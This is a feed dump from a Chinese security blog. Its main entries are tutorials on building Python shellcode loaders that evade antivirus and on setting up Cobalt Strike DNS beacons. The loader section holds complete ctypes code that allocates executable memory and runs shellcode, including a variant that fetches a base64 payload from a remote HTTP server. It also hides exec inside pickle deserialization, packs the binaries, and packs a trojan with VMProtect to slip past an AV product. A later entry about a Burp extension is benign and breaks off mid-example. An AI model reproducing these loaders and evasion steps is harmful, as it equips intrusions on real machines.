</span><br><span class="line"> ctypes.c_int(len(shellcode))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 创建一个线程从shellcode防止位置首地址开始执行</span></span><br><span class="line">handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.pointer(ctypes.c_int(<span class="number">0</span>))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 等待上面创建的线程运行完</span></span><br><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(<span class="number">-1</span>))</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204183555152.png" alt="image-20201204183555152"></p>
<h4 id="分离"><a href="#分离" class="headerlink" title="分离"></a>分离</h4><p>这里通过本地请求Http Server获取ShellCode内容并进行加载执行。</p>
<p>将ShellCode放置VPS上,这里利用Python起一个临时的http服务。</p>
<figure class="highlight axapta"><table><tr><td class="code"><pre><span class="line">python3 -m http.<span class="keyword">server</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204181858175.png" alt="image-20201204181858175"></p>
<p>The shellcode is fetched with a request and then loaded and executed, which separates it from the loader.</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">shellcode</span> = urllib.request.urlopen(<span class="string">'http://192.168.1.1:8000/test.txt'</span>).read()</span><br></pre></td></tr></table></figure>
<h4 id="编码"><a href="#编码" class="headerlink" title="编码"></a>编码</h4><p>我么可以对ShellCode进行混淆编码加密等,再有本地可执行程序进行解密执行,这里我们以Base64编码处理为例,处理过后ShellCode页面如下。</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204182834063.png" alt="image-20201204182834063"></p>
<h4 id="下载ShellCode并执行"><a href="#下载ShellCode并执行" class="headerlink" title="下载ShellCode并执行"></a>下载ShellCode并执行</h4><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes,urllib.request,codecs,base64</span><br><span class="line"></span><br><span class="line">shellcode = urllib.request.urlopen(<span class="string">'http://192.168.1.1:8000/test.txt'</span>).read() <span class="comment"># 请求pyload(base64格式)</span></span><br><span class="line">shellcode = base64.b64decode(shellcode) <span class="comment"># base64解密</span></span><br><span class="line">shellcode =codecs.escape_decode(shellcode)[<span class="number">0</span>] <span class="comment"># </span></span><br><span class="line">shellcode = bytearray(shellcode) <span class="comment"># 返回新字节数组</span></span><br><span class="line"><span class="comment"># 设置VirtualAlloc返回类型为ctypes.c_uint64</span></span><br><span class="line">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br><span class="line"><span class="comment"># 申请内存</span></span><br><span class="line">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(<span class="number">0</span>), ctypes.c_int(len(shellcode)), ctypes.c_int(<span class="number">0x3000</span>), ctypes.c_int(<span class="number">0x40</span>))</span><br><span class="line"> </span><br><span class="line"><span class="comment"># 放入shellcode</span></span><br><span class="line">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br><span class="line">ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> buf, </span><br><span class="line"> ctypes.c_int(len(shellcode))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 创建一个线程从shellcode防止位置首地址开始执行</span></span><br><span class="line">handle = ctypes.windll.kernel32.CreateThread(</span><br><span class="line"> ctypes.c_int(<span 
class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.c_int(<span class="number">0</span>), </span><br><span class="line"> ctypes.pointer(ctypes.c_int(<span class="number">0</span>))</span><br><span class="line">)</span><br><span class="line"><span class="comment"># 等待上面创建的线程运行完</span></span><br><span class="line">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(<span class="number">-1</span>))</span><br></pre></td></tr></table></figure>
<h4 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h4><p>经过了上文的那些操作,使用<code>pyinstaller</code>将我们的程序打包成可执行程序,仍然会给杀软进行查杀。</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205105822973.png" alt="image-20201205105822973"></p>
<p>This is because the key statements of the loader itself are already detected, so it needs further processing to get past static scanning. We can do that with the obfuscation, encoding and encryption mentioned above and then call the result. But functions that execute code, such as <code>exec</code> and <code>eval</code>, have very recognisable signatures, so they need to be dealt with as well.</p>
<p>Like other languages, Python supports serialization: the standard library provides pickle/cPickle for serializing and deserializing any Python data structure, including a class or an object.</p>
<p>During Python deserialization a few built-in methods are invoked on the object being deserialized, much like the <code>__wakeup()</code> magic method in PHP: they are called automatically whenever the deserialization process starts or ends. (See also: deserialization security issues in Python.)</p>
<figure class="highlight gcode"><table><tr><td class="code"><pre><span class="line">__reduce__<span class="comment">()</span> </span><br><span class="line">__reduce_ex__<span class="comment">()</span> </span><br><span class="line">__setstate__<span class="comment">()</span></span><br><span class="line">See the official documentation: https:<span class="comment">//docs.python.org/zh-cn/dev/library/pickle.html</span></span><br></pre></td></tr></table></figure>
<p>Taking <code>__reduce__()</code> as an example:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span><span class="params">(object)</span>:</span></span><br><span class="line"> a = <span class="number">1</span></span><br><span class="line"> b = <span class="number">2</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">print</span>, (self.a+self.b,))</span><br><span class="line"></span><br><span class="line">serialize = pickle.dumps(A()) <span class="comment"># serialize</span></span><br><span class="line">print(serialize)</span><br><span class="line"></span><br><span class="line">unserialize = pickle.loads(serialize) <span class="comment"># deserialize</span></span><br></pre></td></tr></table></figure>
<p><code>pickle.loads</code> deserializes the object and the <code>print</code> call runs automatically.</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201204233028982.png" alt="image-20201204233028982"></p>
<p>The name of the function being called is still visible in the output, so it can be obfuscated, encoded or encrypted as well. Using <code>Base64</code> as the example, the serialize/encode and decode/deserialize code is as follows:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span><span class="params">(object)</span>:</span></span><br><span class="line"> a = <span class="number">1</span></span><br><span class="line"> b = <span class="number">2</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="keyword">return</span> (<span class="keyword">print</span>, (self.a+self.b,))</span><br><span class="line"></span><br><span class="line">serialize = pickle.dumps(A()) <span class="comment"># serialize</span></span><br><span class="line">print(serialize)</span><br><span class="line">print(<span class="string">"========分割线==========="</span>)</span><br><span class="line">serialize_encode = base64.b64encode(serialize) <span class="comment"># base64 encode</span></span><br><span class="line">print(serialize_encode)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205155425112.png" alt="image-20201205155425112"></p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">serialize_encode = <span class="string">b'gASVHAAAAAAAAACMCGJ1aWx0aW5zlIwFcHJpbnSUk5RLA4WUUpQu'</span></span><br><span class="line">serialize_decode = base64.b64decode(serialize_encode)</span><br><span class="line">unserialize = pickle.loads(serialize_decode) <span class="comment"># 反序列化</span></span><br></pre></td></tr></table></figure>
<p>从代码层面来看,看到的是一段正常的base64编码以及反序列化的脚本文件,达到bypass的效果。</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205155553287.png" alt="image-20201205155553287"></p>
<h4 id="反序列化应用"><a href="#反序列化应用" class="headerlink" title="反序列化应用"></a>反序列化应用</h4><p>结合上述说的利用反序列化来进行对我们的ShellCode加载来处理:</p>
<p>先进行序列化操作并进行base64编码,得到base64编码后的序列化:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes,urllib.request,codecs,base64,pickle</span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">"""</span></span><br><span class="line"><span class="string">shellcode = urllib.request.urlopen('http://192.168.1.1:8000/test.txt').read() # 请求pyload(base64格式)</span></span><br><span class="line"><span class="string">shellcode = base64.b64decode(shellcode) # base64解密</span></span><br><span class="line"><span class="string">shellcode =codecs.escape_decode(shellcode)[0] # </span></span><br><span class="line"><span class="string">shellcode = bytearray(shellcode) # 返回新字节数组</span></span><br><span class="line"><span class="string"># 设置VirtualAlloc返回类型为ctypes.c_uint64</span></span><br><span class="line"><span class="string">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span></span><br><span class="line"><span class="string"># 申请内存</span></span><br><span class="line"><span class="string">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))</span></span><br><span class="line"><span class="string"> </span></span><br><span class="line"><span class="string"># 放入shellcode</span></span><br><span class="line"><span class="string">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span></span><br><span class="line"><span class="string">ctypes.windll.kernel32.RtlMoveMemory(</span></span><br><span class="line"><span class="string"> ctypes.c_uint64(ptr), </span></span><br><span class="line"><span class="string"> buf, </span></span><br><span class="line"><span class="string"> ctypes.c_int(len(shellcode))</span></span><br><span class="line"><span class="string">)</span></span><br><span class="line"><span class="string"># 创建一个线程从shellcode防止位置首地址开始执行</span></span><br><span class="line"><span class="string">handle = 
ctypes.windll.kernel32.CreateThread(</span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.c_uint64(ptr), </span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.c_int(0), </span></span><br><span class="line"><span class="string"> ctypes.pointer(ctypes.c_int(0))</span></span><br><span class="line"><span class="string">)</span></span><br><span class="line"><span class="string"># 等待上面创建的线程运行完</span></span><br><span class="line"><span class="string">ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span><span class="params">(object)</span>:</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="keyword">return</span>(<span class="keyword">exec</span>,(shellcode,))</span><br><span class="line"></span><br><span class="line"><span class="comment">#序列化、编码</span></span><br><span class="line">ret = pickle.dumps(A())</span><br><span class="line">ret_base64 = base64.b64encode(ret)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-202012051534357041.png" alt="image-20201205153435704"></p>
<p>Then base64-decode and deserialize; running this script, the beacon checks in normally.</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes,urllib.request,codecs,base64,pickle</span><br><span class="line"><span class="comment"># decode and deserialize</span></span><br><span class="line">ret_base64 = <span class="string">b"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........"</span> </span><br><span class="line">pickle.loads(base64.b64decode(ret_base64))</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205154002722.png" alt="image-20201205154002722"></p>
<h4 id="生成可执行文件"><a href="#生成可执行文件" class="headerlink" title="生成可执行文件"></a>生成可执行文件</h4><h5 id="pyinstaller"><a href="#pyinstaller" class="headerlink" title="pyinstaller"></a>pyinstaller</h5><figure class="highlight dsconfig"><table><tr><td class="code"><pre><span class="line"><span class="string">pyinstaller </span><span class="built_in">--noconsole</span> <span class="built_in">--onefile</span> <span class="string">demo1.</span><span class="string">py </span>-i <span class="string">favicon.</span><span class="string">ico </span>-n <span class="string">demo1 </span></span><br><span class="line"></span><br><span class="line"><span class="built_in">--onefile</span> 打包一个单个文件</span><br><span class="line"><span class="built_in">--noconsole</span> 使用<span class="string">Windows子</span>系统执行.当程序启动的时候不会打开命令行(只对<span class="string">Windows有</span>效)</span><br><span class="line">-i 设置生成执行文件的图标</span><br><span class="line">-n 设置生成执行文件的名字</span><br><span class="line"><span class="comment"># pyinstaller参数可参考:https://pyinstaller.readthedocs.io/en/v3.3.1/usage.html</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205154952238.png" alt="image-20201205154952238"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205154735442.png" alt="image-20201205154735442"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205155120792.png" alt="image-20201205155120792"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205224811833.png" alt="image-20201205224811833"></p>
<p>Some AVs are quite sensitive to anything packed with <code>Pyinstaller</code>; even packing something as trivial as <code>print(1)</code> gives a similar result.</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207153229920.png" alt="image-20201207153229920"></p>
<h5 id="py2exe"><a href="#py2exe" class="headerlink" title="py2exe"></a>py2exe</h5><figure class="highlight css"><table><tr><td class="code"><pre><span class="line"><span class="selector-tag">python</span> <span class="selector-tag">setup</span><span class="selector-class">.py</span> <span class="selector-tag">py2exe</span></span><br><span class="line">注: <span class="selector-tag">py2exe</span>为0<span class="selector-class">.10</span><span class="selector-class">.1</span><span class="selector-class">.0</span>版本,亲测<span class="selector-tag">python3</span><span class="selector-class">.6</span><span class="selector-class">.0</span>、<span class="selector-tag">python3</span><span class="selector-class">.7</span><span class="selector-class">.0</span>、<span class="selector-tag">python3</span><span class="selector-class">.7</span><span class="selector-class">.4</span>、<span class="selector-tag">python3</span><span class="selector-class">.7</span><span class="selector-class">.9</span>可生成可执行文件并正常打开,<span class="selector-tag">python3</span><span class="selector-class">.8</span><span class="selector-class">.0</span>、<span class="selector-tag">python3</span><span class="selector-class">.8</span><span class="selector-class">.2</span>、<span class="selector-tag">python3</span><span class="selector-class">.9</span><span class="selector-class">.0</span> 生成执行文件无法正常使用。</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># setup.py 用于py2exe打包</span></span><br><span class="line"><span class="keyword">from</span> distutils.core <span class="keyword">import</span> setup</span><br><span class="line"><span class="keyword">import</span> py2exe</span><br><span class="line">setup(</span><br><span class="line"> options={</span><br><span class="line"> <span class="string">'py2exe'</span>: {</span><br><span class="line"> <span class="string">'optimize'</span>: <span class="number">2</span>, <span class="comment"># 优化级别最高,</span></span><br><span class="line"> <span class="string">'bundle_files'</span>: <span class="number">1</span>, <span class="comment"># 将生成的调用文件打包进exe文件</span></span><br><span class="line"> <span class="string">'compressed'</span>: <span class="number">1</span>, <span class="comment"># 压缩</span></span><br><span class="line"> },</span><br><span class="line"> },</span><br><span class="line"> windows=[{<span class="string">"script"</span>: <span class="string">"demo2.py"</span>, <span class="comment">#需要打包的程序的文件路径,windows->GUI exe的脚本列表,console-> 控制台exe的脚本列表</span></span><br><span class="line"> <span class="string">"icon_resources"</span>: [(<span class="number">1</span>, <span class="string">"favicon.ico"</span>)]}], <span class="comment"># 程序的图标的图片路径</span></span><br><span class="line"> zipfile=<span class="literal">None</span>, <span class="comment"># 不生成library.zip文件,则捆绑在可执行文件中</span></span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207144921636.png" alt="image-20201207144921636"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207163850250.png" alt="image-20201207163850250"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207150048052.png" alt="image-20201207150048052"></p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201207150125561.png" alt="image-20201207150125561"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.cnblogs.com/Akkuman/p/11851057.html" target="_blank" rel="noopener">https://www.cnblogs.com/Akkuman/p/11851057.html</a></p>
<p><a href="https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/sd73eL3-TnMm0zWLCC8cOQ</a></p>
<p><a href="https://docs.python.org/zh-cn/dev/library/pickle.html" target="_blank" rel="noopener">https://docs.python.org/zh-cn/dev/library/pickle.html</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/148696337" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/148696337</a></p>
]]></content>
<tags>
<tag>Python</tag>
</tags>
</entry>
<entry>
<title>Cobaltstrike Beacon DNS上线</title>
<url>/2020/12/02/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/</url>
<content><![CDATA[<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h4><p>因为最近捣鼓了一下Cobaltstrike DNS上线,发现网上文章大多数千篇一律(复制粘贴),形成很多误导。</p>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">域名平台:阿里云</span><br><span class="line">CobaltStrike版本:<span class="number">4.1</span></span><br></pre></td></tr></table></figure>
<h4 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h4><h5 id="域名配置"><a href="#域名配置" class="headerlink" title="域名配置"></a>域名配置</h5><a id="more"></a>
<figure class="highlight dns"><table><tr><td class="code"><pre><span class="line">添加一条<span class="keyword">A</span>记录指向服务端地址,然后添加两条(可一条)<span class="keyword">NS</span>记录指向<span class="keyword">A</span>记录</span><br></pre></td></tr></table></figure>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201125358965.png" alt="image-20201201125358965"></p>
<h5 id="Listener-配置"><a href="#Listener-配置" class="headerlink" title="Listener 配置"></a>Listener 配置</h5><figure class="highlight routeros"><table><tr><td class="code"><pre><span class="line">Name: 自定义</span><br><span class="line">Payload: Beacon DNS</span><br><span class="line">DNS Hosts: 域名的NS记录(一个以上)</span><br><span class="line">DNS Hosts(Stager):<span class="built_in"> DNS </span>Hosts的中的一个(只有一个的情况就写一样的)</span><br><span class="line">DNS Port(Bind): 空</span><br></pre></td></tr></table></figure>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201144725118.png" alt="image-20201201144725118"></p>
<h5 id="环境检测"><a href="#环境检测" class="headerlink" title="环境检测"></a>环境检测</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">nslookup ns记录</span><br><span class="line">默认情况下看是否返回<span class="number">0.0</span><span class="number">.0</span><span class="number">.0</span>,返回则表示成功。(可通过profile来更改的,其进行流量隐藏等,具体可见参考)</span><br></pre></td></tr></table></figure>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201130948405.png" alt="image-20201201130948405"></p>
<h4 id="生成木马"><a href="#生成木马" class="headerlink" title="生成木马"></a>生成木马</h4><p>这里生成一种进行演示,可自行尝试其他方式。</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201132840569.png" alt="image-20201201132840569"></p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201133135684.png" alt="image-20201201133135684"></p>
<h4 id="上线"><a href="#上线" class="headerlink" title="上线"></a>上线</h4><p>目标靶机执行生成的木马文件</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201133647578.png" alt="image-20201201133647578"></p>
<figure class="highlight dns"><table><tr><td class="code"><pre><span class="line">出现小黑电脑右键->Interact</span><br><span class="line">输入命令</span><br><span class="line">checkin #强制回连</span><br><span class="line">注:很多文章需输入mode dns-txt (默认就为dns-txt模式)</span><br><span class="line">根据官方文档描述,CS4中有三种数据传输模式,<span class="keyword">A</span>、<span class="keyword">AAAA</span>、<span class="keyword">TXT</span>,默认是<span class="keyword">TXT</span></span><br></pre></td></tr></table></figure>
<p>显示蓝色电脑如图则成功上线</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201133927679.png" alt="image-20201201133927679"></p>
<p>Run whoami</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201135019135.png" alt="image-20201201135019135"></p>
<h4 id="免杀"><a href="#免杀" class="headerlink" title="免杀"></a>免杀</h4><p>这里演示一下加壳免杀过某绒。</p>
<p>免杀前,生成的文件直接给某绒自动处理了。</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201143243313.png" alt="image-20201201143243313"></p>
<p>Pack it with VMProtect</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201143432147.png" alt="image-20201201143432147"></p>
<p>Scan it</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201144944327.png" alt="image-20201201144944327"></p>
<p>Test</p>
<p><img src="/img/Cobaltstrike-Beacon-DNS%E4%B8%8A%E7%BA%BF/image-20201201154931556.png" alt="image-20201201154931556"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://xz.aliyun.com/t/7938" target="_blank" rel="noopener">https://xz.aliyun.com/t/7938</a></p>
<p><a href="https://www.nctry.com/1655.html" target="_blank" rel="noopener">https://www.nctry.com/1655.html</a></p>
<p><a href="https://choge.top/2020/08/16/Cobaltstrike%E4%B9%8B%E6%B5%81%E9%87%8F%E9%9A%90%E8%97%8F/" target="_blank" rel="noopener">https://choge.top/2020/08/16/Cobaltstrike%E4%B9%8B%E6%B5%81%E9%87%8F%E9%9A%90%E8%97%8F/</a></p>
]]></content>
<tags>
<tag>Cobaltstrike</tag>
</tags>
</entry>
<entry>
<title>某SRC任意文件包含漏洞 包含日志Getshell</title>
<url>/2020/10/20/%E6%9F%90SRC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E-%E5%8C%85%E5%90%AB%E6%97%A5%E5%BF%97Getshell/</url>
<content><![CDATA[<div id="hexo-blog-encrypt" data-wpm="密码不正确,请重新输入!" data-whm="文章不能被校验, 不过您还是能看看解密后的内容!">
<div class="hbe-input-container">
<input type="password" id="hbePass" placeholder="" />
<label for="hbePass">该文章已加密, 请输入密码查看。</label>
<div class="bottom-line"></div>
</div>
<script id="hbeData" type="hbeData" data-hmacdigest="c81eda7ff55877f1cad0bf7df46f730520ee4ac93067774dc51d8bdc27d071be">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</script>
</div>
<script src="/lib/blog-encrypt.js"></script><link href="/css/blog-encrypt.css" rel="stylesheet" type="text/css">]]></content>
<tags>
<tag>ThinkCMF</tag>
</tags>
</entry>
<entry>
<title>BurpSuite-Extender-Unexpected information</title>
<url>/2020/09/28/Unexpected_information_BurpSuite_Extensions/</url>
<content><![CDATA[<p>I recently wrote a BurpSuite extension that marks sensitive information, JS API endpoints and a few special fields in request and response packets, so that we do not overlook a packet by mistake. I named it "Unexpected information"; using it may turn up information you did not expect.</p>
<a id="more"></a>
<h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><h5 id="支持列表"><a href="#支持列表" class="headerlink" title="支持列表"></a>支持列表</h5><ul>
<li><input checked="" disabled="" type="checkbox"> 身份证信息</li>
<li><input checked="" disabled="" type="checkbox"> 手机号信息</li>
<li><input checked="" disabled="" type="checkbox"> IP信息</li>
<li><input checked="" disabled="" type="checkbox"> 邮箱信息</li>
<li><input checked="" disabled="" type="checkbox"> JS文件API接口路径</li>
<li><input checked="" disabled="" type="checkbox"> 特殊字段(password、method: “post”…)</li>
<li><input checked="" disabled="" type="checkbox"> 双向检测</li>
<li><input checked="" disabled="" type="checkbox"> 高亮显示</li>
</ul>
<h5 id="高亮模式"><a href="#高亮模式" class="headerlink" title="高亮模式"></a>Highlight mode</h5><figure class="highlight clean"><table><tr><td class="code"><pre><span class="line">Email -> yellow</span><br><span class="line">Internal IP -> red</span><br><span class="line">Mobile number -> green</span><br><span class="line">ID card number -> green</span><br><span class="line">Others -> none (only the Unexpected information tab is opened)</span><br></pre></td></tr></table></figure>
<p>When a packet contains matching information (such as a mobile number, IP address, email address or ID card number), the corresponding request in the HTTP history tab is automatically highlighted in the matching colour, and a new tab named "Unexpected information" is opened to show what was matched.</p>
<h4 id="如何使用"><a href="#如何使用" class="headerlink" title="如何使用"></a>How to use</h4><figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line"><span class="keyword">BurpSuite </span>>> <span class="keyword">Extender </span>>> <span class="keyword">Extensions </span>>> <span class="keyword">Add </span>>> <span class="keyword">Extension </span>type: <span class="keyword">Java </span>>> Select file ...>> select the plugin (Unexpected information.<span class="keyword">jar)</span></span><br><span class="line"><span class="keyword">Note: avoid directories whose path contains Chinese characters</span></span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/ScriptKid-Beta/Unexpected_information/master/image-20200913144353237.png" alt="image-20200913144353237"></p>
<h4 id="效果"><a href="#效果" class="headerlink" title="效果"></a>Result</h4><p><img src="https://raw.githubusercontent.com/ScriptKid-Beta/Unexpected_information/master/image-20200913151710096.png" alt="image-20200913151710096"></p>
<p><img src="https://raw.githubusercontent.com/ScriptKid-Beta/Unexpected_information/master/image-20200913152201413.png" alt="image-20200913152201413"></p>
<h4 id="项目地址"><a href="#项目地址" class="headerlink" title="项目地址"></a>Project links</h4><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">https:<span class="regexp">//gi</span>thub.com<span class="regexp">/ScriptKid-Beta/</span>Unexpected_information</span><br><span class="line"></span><br><span class="line"><span class="regexp">//</span> jar file</span><br><span class="line">https:<span class="regexp">//gi</span>thub.com<span class="regexp">/ScriptKid-Beta/</span>Unexpected_information<span class="regexp">/releases</span></span><br></pre></td></tr></table></figure>
<h4 id="最后"><a href="#最后" class="headerlink" title="最后"></a>Finally</h4><p>Stars are welcome, and most importantly, if you have suggestions or find a bug, please raise it in the issues or leave a message on the WeChat official account.</p>
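<p>The matching and colouring rules described above, as an added stand-alone example that is not the extension's own code: a small Python model of the same classification (email, internal versus public IP, mobile number, ID card number, API path, special field) run over a constructed HTTP response. The regular expressions, the ISO 7064 MOD 11-2 check-digit validation used to drop ID-card false positives, and the colour precedence applied when several kinds match are assumptions for this example; the post does not say which colour wins when more than one kind is present.</p>

```python
import ipaddress
import re

# Detection patterns; assumed for this example, not the extension's own regexes.
PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    # Mainland mobile number: 11 digits starting 13-19, not embedded in a longer run.
    "phone": re.compile(r"(?<!\d)1[3-9]\d{9}(?!\d)"),
    # 18-digit resident ID: region(6) birth date(8) sequence(3) check digit(1).
    "id_card": re.compile(
        r"(?<!\d)[1-9]\d{5}(?:19|20)\d{2}(?:0[1-9]|1[0-2])"
        r"(?:0[1-9]|[12]\d|3[01])\d{3}[0-9Xx](?!\d)"
    ),
    # Quoted API path, the kind of string a JS bundle leaks.
    "api_path": re.compile(r"""["'](/(?:api|v\d+)/[A-Za-z0-9_/.-]+)["']"""),
    "special_field": re.compile(r"\b(password|passwd|secret|token)\b", re.IGNORECASE),
}

# Highlight colours from the post; the precedence order is an assumption.
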